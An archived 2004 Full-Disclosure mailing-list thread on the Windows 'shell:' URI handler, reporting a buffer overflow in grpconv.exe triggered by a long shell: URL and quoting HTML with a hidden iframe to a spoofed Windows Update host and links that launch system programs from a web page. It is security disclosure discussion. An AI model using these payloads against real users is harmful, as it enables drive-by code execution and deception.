OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Re: [Full-Disclosure] shell:windows command question

From: Andreas Sandblad (sandbladacc.umu.se)
Date: Wed Jul 07 2004 - 14:25:12 CDT


This is dangerous. Based on the file extension of the shell protocol
different applications may be launched. For example:
shell:.its will launch Internet Explorer
and shell:.mp3 will launch Winamp.

The trick is to find an application that will overflow when given a
very long parameter. A quick check showed that a buffer overflow occured
within MSProgramGroup (WINDOWS\System32\grpconv.exe) after around 230
bytes with the following URL:
shell:[x*221].grp
EIP can be controled, but exploitation is a bit tricky since parameter is
stored as unicode.

Also Winamp contains an BO (no unicode here).

Tested environment:
Windows XP pro + FireFox 0.9.1

/Andreas Sandblad

On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:

> -----snip------
> center><br><br><img src="nocigar.gif"></center>
> <center>
> <a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe
> src="http://windowsupdate.microsoft.com%2F.http-
> equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
> [customise as you see fit]
> <http://www.malware.com/stockpump.html>
> ------end----------
> The code above has interest to me.
> Even in Mozilla the commands below will work.
> <a href=shell:windows\\system32\\calc.exe>1</a>
> <a href=shell:windows\system32\calc.exe>2</a>
> <a href=shell:windows\system32\winver.exe>4</a>
> Just save them to an .html file and run it.
> The first one with the double quotes was from bugtraq:
> Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
> <http://seclists.org/lists/bugtraq/2004/Mar/0188.html>
> The links below that will run calc as well as winver.
> It seems it calls windows as a virtual dir because c:\winxp is what I have.
> I have been playing around to see if cmd.exe will work with it but without
> luck.
> This is what is in the registry.
> HKEY_CLASSES_ROOT\Shell
> Look in the registry key above. You will find the shell object calls Windows
> Explorer with a particular set of arguments.
> %SystemRoot%\Explorer.exe /e,/idlist,%I,%L
> So this is tied to explorer.exe. This is something involved with the
> underlying functions of windows
> and not IE so to speak because it works in Mozilla or from the run line.
> I'm trying to find out more about the shell: command because I can put a
> link on a site that seems to run anything
> in system32 dir. I'd like to see if you can pass parameters to it.
>
> Anyone give me more info on the shell:windows command?
> JP
>
>
> Joshua Perrymon
> Sr. Network Security Consultant
> PGP Fingerprint
> 51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021
>
> **********CONFIDENTIALITY NOTICE**********
> The information contained in this e-mail may be proprietary and/or
> privileged and is intended for the sole use of the individual or
> organization named above. If you are not the intended recipient or an
> authorized representative of the intended recipient, any review, copying
> or distribution of this e-mail and its attachments, if any, is prohibited.
> If you have received this e-mail in error, please notify the sender
> immediately by return e-mail and delete this message from your system.
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
      _ _
    o' \,=./ `o
       (o o)
---ooO--(_)--Ooo---
 Andreas Sandblad
      Sweden

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html